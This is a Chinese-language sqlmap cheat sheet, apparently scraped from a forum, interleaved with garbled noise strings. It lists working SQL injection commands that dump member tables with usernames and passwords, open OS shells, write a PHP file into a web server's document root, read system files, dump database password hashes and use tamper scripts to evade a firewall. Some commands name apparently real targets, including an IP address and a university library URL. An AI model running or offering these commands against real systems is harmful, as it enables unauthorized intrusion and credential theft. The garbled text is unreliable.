/pentest/database/sqlmap) f+ D% `& P1 X7 V
, [, w. N* f6 e, W
update :::::> in the folder after execute following order : svn update
; b8 a k: @7 m0 x. L( Q+ N1 G! Z1 u3 `
sqlmap.py -r 1.txt --current-db
5 Z" H" ]; F( l
. |; t, ]3 t( _v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”3 v) c% K- D8 j# K) V7 \: B
* {5 m3 z9 B Y4 y: |; d" o
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) - F* {- o* Z$ U% t4 O3 B/ F5 i
猜解数据库
' Y; [3 N9 g/ o9 x. c./sqlmap.py -u "injection-url" --dbs% d. J; O8 D# K7 w9 `$ k+ Q7 f$ n) O. j
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
, \4 s- H9 i4 ~- c1 j% j9 }
2 c, N8 v3 R# [$ q8 m猜解表名
. i+ d2 H$ T3 ?0 H4 g, M# r./sqlmap.py -u "injection-url" -D database_name --tables
2 C" q- Q8 }$ t7 p( U) P7 u# Z% b b
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"5 b) ]1 X k+ H. l8 d9 l
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" ; W* x$ d" r& [/ p& r& c
& m, \8 F4 v* S- G) `0 T* {sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
/ g$ E) ^ _+ ?+ y8 U* i; _$ C5 t8 j/ B: w1 N6 p) k* M3 M9 ^
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
; `8 V8 ?: e5 B0 y5 Osqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"' T6 ~$ {3 z4 B" o) y
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
, |% R, E2 f1 k7 Vsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
1 w* w% v7 X1 I: M# c2 A6 F. j
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
2 t2 O3 _$ t0 n9 [sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
3 S7 U, J9 y- K1 V9 J& Ssqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"3 }) p$ R! x5 A' y0 U' y# d
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
+ W _2 M3 M* s- Isqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
5 X7 X/ c2 ]" i1 P' `4 X5 }8 \6 t$ I5 T' W1 `4 R" ]/ D; b
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了8 }' \8 \! z8 C! G1 Y" T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
" z9 [' ^7 x; q) h) Z5 Z5 g: K
p! @. n2 n4 q! Tsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
* k2 I3 M- E0 Y9 G: ]3 K猜解列名% j1 l6 c2 S$ s9 g. r @ T
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns2 {/ ]8 R0 C) g; o$ J& a. V
1 n* X$ X0 e8 `! \/ u
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
. m7 h5 a, R {. d- |6 C5 ^7 {& Ysqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
" a6 O/ s4 I% N7 P' M5 \sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"4 y) s3 N( O& |8 u2 F
7 }: A6 s" [. ?( \sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py": B* O! D; A, d+ \: A- v; y+ H2 \2 _
&submit=Go; T" l8 C' P& K X/ z$ I8 d
猜解值8 z1 Y7 x. T" X1 m
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump9 _# Y- x6 L! |9 U4 q/ B
========================================================* r$ e, e1 O- E' D/ |: p
搜索表名中包括mana字符的* E+ x5 o' S) Q
/sqlmap.py -u "injection-url" -T mana --search y7 q, i$ a6 R- q% ]7 x
返回一个交互式sql shell, k4 k6 j# @0 f/ w9 B
/sqlmap.py -u "injection-url" --sql-shell8 ]& t. C' d4 W3 A& b5 p# z/ a/ G
读取指定文件(需权限)
9 h* X3 a: T$ U3 X s# k3 V* m9 a/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"+ o9 i+ k7 |, G/ Y
查看当前 用户 及 数据库 . @; ~8 @: I. P7 p* w
/sqlmap.py -u "injection-url" --current-user --current-db: D) q8 i: d# a
本地文件 写入 远程目标绝对路径$ P0 N, M$ G4 t! t7 X+ }0 X X
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径1 `2 u. }/ i, n; {1 i) L6 D
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
8 P3 v5 E( q3 W _2 g5 a- h
2 _8 Y8 \8 g, J% V7 ]8 Msqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径! c2 y8 x4 l# X# U5 g
查看某用的权限4 a4 x" |! }) B3 c* A4 b
/sqlmap.py -u "injection-url" --privileges -U root
8 z, Y2 P# {! |7 {& n4 }查看当前用户是否为dba. E" i, T6 B, H5 k+ e! D
/sqlmap.py -u "injection-url" --is-dba9 ^/ f& G' E$ y! C: i
读取所有数据库用户或指定数据库用户的密码/ L. T! B+ a1 H! J$ v0 ~
sqlmap.py -r 1.txt --users --passwords+ N5 M8 e6 t9 X7 T2 F( z/ S' l W
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
* G1 a3 ]' Z5 S+ n+ L2 b+ p( y) ~' ]& G+ A" P* h L, `
/sqlmap.py -u "injection-url" --passwords -U root1 |1 V1 {0 U4 M6 ]4 J- q/ m
5 z1 O( ?9 q* H5 @; t8 @--start&&--stop 与 --first&&--last 的区别
1 s9 U& R: A4 t" `. D/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)& [: p8 i/ Z0 n- t, m. n4 X) L. R
6 Y8 d% `3 k! ?) d" Q5 c) u0 `
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)' Y# ^: A6 M$ D, q
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables9 q- v! G/ f+ }! t% _9 f0 F
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
6 z1 L3 {+ ?# h! J! g
# m! G& O& B1 ^& [! T& F执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
0 b- ^+ u1 b& O/ {4 K/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"* t2 v6 c& t, W1 q" \
: i! L2 z# o9 o0 S |